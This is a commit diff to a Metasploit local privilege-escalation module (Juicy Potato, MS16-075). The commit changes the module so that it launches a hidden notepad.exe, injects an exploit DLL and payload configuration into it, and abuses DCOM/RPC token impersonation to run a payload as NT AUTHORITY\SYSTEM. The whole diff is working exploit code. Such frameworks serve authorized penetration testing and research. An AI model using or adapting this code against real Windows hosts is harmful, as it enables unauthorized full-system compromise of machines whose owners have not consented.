feat: spawn as NT AUTHORITY\SYSTEM

modules/exploits/windows/local/ms16_075_reflection_juicy.rb

@@ -30,7 +30,8 @@ class MetasploitModule < Msf::Exploit::Local
           'breenmachine', # Rotten Potato NG!
           'decoder', # Lonely / Juicy Potato
           'ohpe', # Juicy Potato
-          'phra' # MSF Module
+          'phra', # MSF Module
+          'lupman' # MSF Module
         ],
       'Arch'           => [ARCH_X86, ARCH_X64],
       'Platform'       => 'win',
@@ -38,14 +39,13 @@ class MetasploitModule < Msf::Exploit::Local
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'none',
-          'WfsDelay' => '0',
+          'WfsDelay' => '20'
-          'DisablePayloadHandler' => 'true'
         },
       'Targets'        =>
         [
-          ['Automatic', {}],
+          ['Automatic', {}]
-          ['Windows x86', { 'Arch' => ARCH_X86 }],
+          #['Windows x86', { 'Arch' => ARCH_X86 }],
-          ['Windows x64', { 'Arch' => ARCH_X64 }]
+          #['Windows x64', { 'Arch' => ARCH_X64 }]
         ],
       'Payload'         =>
         {
@@ -67,16 +67,16 @@ class MetasploitModule < Msf::Exploit::Local
 
     register_options(
       [
-        OptString.new('CLSID', [ true, 'Set CLSID value of the DCOM to trigger', '{4991d34b-80a1-4291-83b6-3328366b9097}' ]),
+        OptString.new('CLSID', [ true, 'Set CLSID value of the DCOM to trigger', '{4991d34b-80a1-4291-83b6-3328366b9097}' ])
-        OptPort.new('DCOM_PORT', [ true, 'Set listening port for MITM DCOM communication', 6666 ])
       ])
 
     register_advanced_options(
       [
-        OptAddress.new('RPC_IP', [ true, 'Set RPC_IP value', '127.0.0.1' ]),
+        OptAddress.new('RpcServerHost', [ true, 'Set RPC server target host', '127.0.0.1' ]),
-        OptPort.new('RPC_PORT', [ true, 'Set RPC_PORT value', 135 ]),
+        OptPort.new('RpcServerPort', [ true, 'Set RPC server target port', 135 ]),
-        OptAddress.new('DCOM_IP', [ true, 'Set DCOM_IP value', '127.0.0.1' ]),
+        OptAddress.new('ListeningAddress', [ true, 'Set listening address for MITM DCOM communication', '127.0.0.1' ]),
-        OptString.new('LOGFILE', [ false, 'Set the log file' ]),
+        OptPort.new('ListeningPort', [ true, 'Set listening port for MITM DCOM communication', 7777 ]),
+        OptString.new('LogFile', [ false, 'Set the log file' ])
       ])
   end
 
@@ -98,17 +98,35 @@ class MetasploitModule < Msf::Exploit::Local
     return my_target
   end
 
-  def verify_arch(my_target)
+  # Creates a temp notepad.exe to inject payload in to given the payload
-    if my_target["Arch"] != sysinfo["Architecture"]
+  def create_temp_proc()
-      print_error("Assigned Target Arch = #{my_target.opts['Arch']}")
+    windir = client.sys.config.getenv('windir')
-      print_error("Actual Target Arch = #{sysinfo['Architecture']}")
+    # Select path of executable to run depending the architecture
-      fail_with(Failure::BadConfig, "Assigned Arch does not match reality")
+    if sysinfo["Architecture"] == ARCH_X64 and client.arch == ARCH_X86 and @payload_arch.first == ARCH_X64
-    end
+      cmd = "#{windir}\\Sysnative\\notepad.exe"
-    if client.arch != sysinfo["Architecture"]
+    elsif sysinfo["Architecture"] == ARCH_X64 and client.arch == ARCH_X64 and @payload_arch.first == ARCH_X86
-      fail_with(Failure::BadConfig, "Session/Target Arch mismatch; WOW64 not supported")
+      cmd = "#{windir}\\SysWOW64\\notepad.exe"
     else
-      vprint_good("Current payload and target Arch match....")
+      cmd = "#{windir}\\System32\\notepad.exe"
     end
+    begin
+      proc = client.sys.process.execute(cmd, nil, {'Hidden' => true})
+    rescue Rex::Post::Meterpreter::RequestError
+      return nil
+    end
+
+    return proc
+  end
+
+  def create_temp_proc_stage2()
+    windir = client.sys.config.getenv('windir')
+    # Select path of executable to run depending the architecture
+    if sysinfo["Architecture"] == ARCH_X64 and @payload_arch.first == ARCH_X86
+      cmd = "#{windir}\\SysWOW64\\notepad.exe"
+    else
+      cmd = "#{windir}\\System32\\notepad.exe"
+    end
+    return cmd
   end
 
   def check
@@ -124,9 +142,6 @@ class MetasploitModule < Msf::Exploit::Local
     if privs.include?('SeImpersonatePrivilege')
       return Exploit::CheckCode::Appears
     end
-    if privs.include?('SeAssignPrimaryToken')
-      return Exploit::CheckCode::Appears
-    end
     return Exploit::CheckCode::Safe
   end
 
@@ -134,24 +149,24 @@ class MetasploitModule < Msf::Exploit::Local
     if is_system?
       fail_with(Failure::None, 'Session is already elevated')
     end
+    @payload_name = datastore['PAYLOAD']
+    @payload_arch = framework.payloads.create(@payload_name).arch
     my_target = assign_target
-    print_status("#{my_target['Arch']}")
-    verify_arch(my_target)
     if check == Exploit::CheckCode::Safe
-      fail_with(Failure::NoAccess, 'User does not have SeImpersonate or SeAssignPrimaryToken Privilege or Windows version not supported')
+      fail_with(Failure::NoAccess, 'User does not have SeImpersonate or SeAssignPrimaryToken Privilege')
     end
-    if my_target.opts['Arch'] == 'x64'
+    if @payload_arch.first == ARCH_X64
       dll_file_name = 'juicypotato.x64.dll'
       vprint_status("Assigning payload juicypotato.x64.dll")
-    elsif my_target.opts['Arch'] == 'x86'
+    elsif @payload_arch.first == ARCH_X86
       dll_file_name = 'juicypotato.x86.dll'
       vprint_status("Assigning payload juicypotato.x86.dll")
     else
       fail_with(Failure::BadConfig, "Unknown target arch; unable to assign exploit code")
     end
     print_status('Launching notepad to host the exploit...')
-    notepad_process = client.sys.process.execute('notepad.exe', nil, 'Hidden' => true)
+    notepad_process = create_temp_proc
-    #notepad_process = client.sys.process.execute('cmd.exe', nil, 'Hidden' => true)
+    cmd = create_temp_proc_stage2
     begin
       process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)
       print_good("Process #{process.pid} launched.")
@@ -165,13 +180,13 @@ class MetasploitModule < Msf::Exploit::Local
     print_status("Injecting exploit into #{process.pid}...")
     exploit_mem, offset = inject_dll_into_process(process, library_path)
     print_status("Exploit injected. Injecting exploit configuration into #{process.pid}...")
-    #payload_mem = inject_into_process(process, payload.encoded)
+    configuration = "#{datastore['LogFile']}\x00"
-    configuration = "#{datastore['LOGFILE']}\x00"
+    configuration += "#{cmd}\x00"
     configuration += "#{datastore['CLSID']}\x00"
-    configuration += "#{datastore['DCOM_PORT']}\x00"
+    configuration += "#{datastore['ListeningPort']}\x00"
-    configuration += "#{datastore['RPC_IP']}\x00"
+    configuration += "#{datastore['RpcServerHost']}\x00"
-    configuration += "#{datastore['RPC_PORT']}\x00"
+    configuration += "#{datastore['RpcServerPort']}\x00"
-    configuration += "#{datastore['DCOM_IP']}\x00"
+    configuration += "#{datastore['ListeningAddress']}\x00"
     configuration += "#{payload.encoded.length}\x00"
     configuration += payload.encoded
     payload_mem = inject_into_process(process, configuration)
@@ -179,6 +194,6 @@ class MetasploitModule < Msf::Exploit::Local
     # we want invoked on successful exploitation.
     print_status('Configuration injected. Executing exploit...')
     process.thread.create(exploit_mem + offset, payload_mem)
-    print_good('Exploit finished, check incognito module.')
+    print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
   end
 end